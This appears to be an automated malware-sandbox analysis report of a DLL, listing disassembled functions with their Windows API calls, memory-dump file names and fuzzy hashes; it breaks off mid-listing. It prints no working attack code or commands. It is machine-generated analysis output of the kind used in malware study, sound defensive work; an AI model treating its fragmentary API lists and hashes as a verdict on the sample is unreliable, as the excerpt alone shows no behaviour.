GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEB2994
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 6CEB29E2
InterlockedDecrement.KERNEL32(?), ref: 6CEB2A21
InterlockedExchange.KERNEL32(?,00000000), ref: 6CEB2A80
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2A8B
InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2A9F
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 6CEB2AAF
GetLastError.KERNEL32(?,?,00000000), ref: 6CEB2AB9

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$ErrorLast$CompareCompletionQueuedStatus$DecrementH_prologPost
String ID:
API String ID: 828728103-0
Opcode ID: f1b3e34d4ff81916c97e173a1e11662630c0802fc65d95e3d48f085202b12864
Instruction ID: e7fea06c29bb15676f82af15010737d7c04ecc9b30ebd03e2dd09d4572150c61
Opcode Fuzzy Hash: f1b3e34d4ff81916c97e173a1e11662630c0802fc65d95e3d48f085202b12864
Instruction Fuzzy Hash: 01513271900209DFCB15DFA4C9889EEBBB8FF19358F20452EE556E3740D7349949CB60

Function 6CED0A82 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,00000001,6CECC3A8,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?,00000001,?), ref: 6CED0A8A
_free.LIBCMT ref: 6CED0AA3

Part of subcall function 6CECB6E4: HeapFree.KERNEL32(00000000,00000000,?,6CECE422,00000000,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8,00000008,6CED1054,?), ref: 6CECB6F8
Part of subcall function 6CECB6E4: GetLastError.KERNEL32(00000000,?,6CECE422,00000000,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8,00000008,6CED1054,?,?), ref: 6CECB70A

_free.LIBCMT ref: 6CED0AB6
_free.LIBCMT ref: 6CED0AD4
_free.LIBCMT ref: 6CED0AE6
_free.LIBCMT ref: 6CED0AF7
_free.LIBCMT ref: 6CED0B02
_free.LIBCMT ref: 6CED0B26
EncodePointer.KERNEL32(0104D738), ref: 6CED0B2D
_free.LIBCMT ref: 6CED0B42
_free.LIBCMT ref: 6CED0B58
_free.LIBCMT ref: 6CED0B80

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 605cb2b0940e02b6f25e825c4494127e42e4930dd584d3d113d846d3907fc86e
Instruction ID: 29d43b618cc93ab134a1902d8573eb2ce3efa508be1b3d1a69a981252ddd5294
Opcode Fuzzy Hash: 605cb2b0940e02b6f25e825c4494127e42e4930dd584d3d113d846d3907fc86e
Instruction Fuzzy Hash: 20218B72B026D19FDF018F25E94095E3774AB8B32C33A056FE87497780CB31A845CB95

Function 6CEB50F7 Relevance: 15.4, APIs: 10, Instructions: 371networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB50FC

Part of subcall function 6CECC29F: _malloc.LIBCMT ref: 6CECC2B7

htons.WS2_32(?), ref: 6CEB515D
htonl.WS2_32(00000000), ref: 6CEB5180
htonl.WS2_32(00000000), ref: 6CEB5187
htons.WS2_32(?), ref: 6CEB51A8
htons.WS2_32(?), ref: 6CEB51FA
_sprintf.LIBCMT ref: 6CEB520D
htonl.WS2_32(00000000), ref: 6CEB541E
htonl.WS2_32(00000000), ref: 6CEB5425
htons.WS2_32(?), ref: 6CEB544F

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: htonlhtons$H_prolog_malloc_sprintf
String ID:
API String ID: 876449343-0
Opcode ID: 8f1d14478912a25b6a0f7a7fcd4aac3875137bb797a2bb5e47aa88cc8373e385
Instruction ID: 35c4f11aafbd2452c207c395e3dfafd9b5efa07c2593694a396b72575df9cf08
Opcode Fuzzy Hash: 8f1d14478912a25b6a0f7a7fcd4aac3875137bb797a2bb5e47aa88cc8373e385
Instruction Fuzzy Hash: D6E13BB1D01249AADF05DBE0DA45BFEB7B8AF15308F20406EE506B3781EB745A4CCB61

Function 6CEB3C71 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx,?,?,00000000,000000FF,,Wl,6CEB9DD2,?,,Wl,?), ref: 6CEB3CC8
GetProcAddress.KERNEL32(00000000), ref: 6CEB3CCF
GetLastError.KERNEL32(?,?,00000000,000000FF,,Wl,6CEB9DD2,?,,Wl,?,?,?,?,?,?,6CEB572C,00000000), ref: 6CEB3CE3
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 6CEB3D36

Strings

CancelIoEx, xrefs: 6CEB3CBE
,Wl, xrefs: 6CEB3C71
KERNEL32, xrefs: 6CEB3CC3

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AddressCompareErrorExchangeHandleInterlockedLastModuleProc
String ID: ,Wl$CancelIoEx$KERNEL32
API String ID: 3007240809-635205114
Opcode ID: a61aca4cc042abe29e21b1306d461fe08ae5cb15222cdaa278a20f505d898af7
Instruction ID: 56bbac36d8c750cabdb9f5c38a54e9b153dc41691e31e545274e6597ce1b26f6
Opcode Fuzzy Hash: a61aca4cc042abe29e21b1306d461fe08ae5cb15222cdaa278a20f505d898af7
Instruction Fuzzy Hash: 49319F75604742DFD714CF64C955A6AB7B8FF59328F200A2DE965A7B80DF30A808CB91

Function 6CEC9D70 Relevance: 10.6, APIs: 7, Instructions: 132COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6CEC9E10
CloseHandle.KERNEL32(00000000), ref: 6CEC9E25
ResetEvent.KERNEL32(00000000), ref: 6CEC9E2F
CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CEC9E64
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,321BCB28), ref: 6CEC9EDA
CloseHandle.KERNEL32(00000000), ref: 6CEC9EEF

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateOpenReset
String ID:
API String ID: 1285874450-0
Opcode ID: 24faa4d86b590b436daa8c773942a09415ae090c489152bb59ba81ddff603e53
Instruction ID: 36333799dd320a6ee5dae764066a05b56d4362e7ceb7c1e2a64af798a4fbbf6f
Opcode Fuzzy Hash: 24faa4d86b590b436daa8c773942a09415ae090c489152bb59ba81ddff603e53
Instruction Fuzzy Hash: BC413D71E05359DFDF10CFA5C944B9EBBB8AB0971CF244219E439AB780D734A905CBA2

Function 6CEC9E82 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CECA640: OpenEventA.KERNEL32(00100002,00000000,?,?,?,6CEC9E8E,?,?), ref: 6CECA66F
Part of subcall function 6CECA640: CloseHandle.KERNEL32(00000000,?,?,6CEC9E8E,?,?), ref: 6CECA684
Part of subcall function 6CECA640: SetEvent.KERNEL32(00000000,6CEC9E8E,?,?), ref: 6CECA697

OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6CEC9E10
CloseHandle.KERNEL32(00000000), ref: 6CEC9E25
ResetEvent.KERNEL32(00000000), ref: 6CEC9E2F
CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CEC9E64
__CxxThrowException@8.LIBCMT ref: 6CEC9E95

Part of subcall function 6CECCCAA: RaiseException.KERNEL32(?,?,?,6CEEA73C,?,00000400,?,?,?,6CECC2EF,?,6CEEA73C,?,00000001), ref: 6CECCCFF

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,321BCB28), ref: 6CEC9EDA
CloseHandle.KERNEL32(00000000), ref: 6CEC9EEF

Part of subcall function 6CECA380: GetCurrentProcessId.KERNEL32(?), ref: 6CECA3D9

WaitForSingleObject.KERNEL32(00000000,000000FF,321BCB28), ref: 6CEC9EFF

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
